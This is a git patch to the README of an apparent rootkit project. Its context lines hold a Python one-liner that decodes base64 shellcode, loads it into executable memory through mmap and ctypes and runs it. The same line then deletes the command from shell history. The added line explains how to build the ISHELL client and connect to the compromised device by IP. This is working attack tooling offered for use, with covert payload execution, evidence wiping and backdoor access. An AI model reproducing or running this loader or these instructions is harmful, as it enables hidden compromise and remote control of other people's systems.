From 78dc738ad465e48e954b9b8321cea6c4a97a4c2e Mon Sep 17 00:00:00 2001
From: mephistolist <49227141+mephistolist@users.noreply.github.com>
Date: Wed, 9 Oct 2024 06:03:09 +0000
Subject: [PATCH] Update README.md
---
 README.md | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index 5874e83..7e0906a 100644
--- a/README.md
+++ b/README.md
@@ -10,3 +10,5 @@ You can run the entire rootkit from the command-line like so:
 ```
 python3 -c 'import base64, mmap, ctypes; encoded_shellcode = "SDHJSIHp9////0iNBe////9Iu6ajGtSlB5bkSDFYJ0gt+P///+L07hs1tsxpuZfOo4OE8VjEgs6OeYD7VX75pqMa+81o+4GJ03LnlnW5rfXrX5jpKuDUiJE1vdZv8uTw9E6KzzzO66OjGtSlB5bk"; shellcode = base64.b64decode(encoded_shellcode); mem = mmap.mmap(-1, len(shellcode), mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS, mmap.PROT_WRITE | mmap.PROT_READ | mmap.PROT_EXEC); mem.write(shellcode); addr = ctypes.addressof(ctypes.c_char.from_buffer(mem)); shell_func = ctypes.CFUNCTYPE(None)(addr); print("... and I won’t have to send a second."); shell_func()' && history -d $(history | awk 'END { print $1 }')
 ```
+
+From there you may go into the ISHELL-v0.3 folder and type 'make linux' to build ish. Then you may run ish with the ip of the device the rootkit was ran on to connect.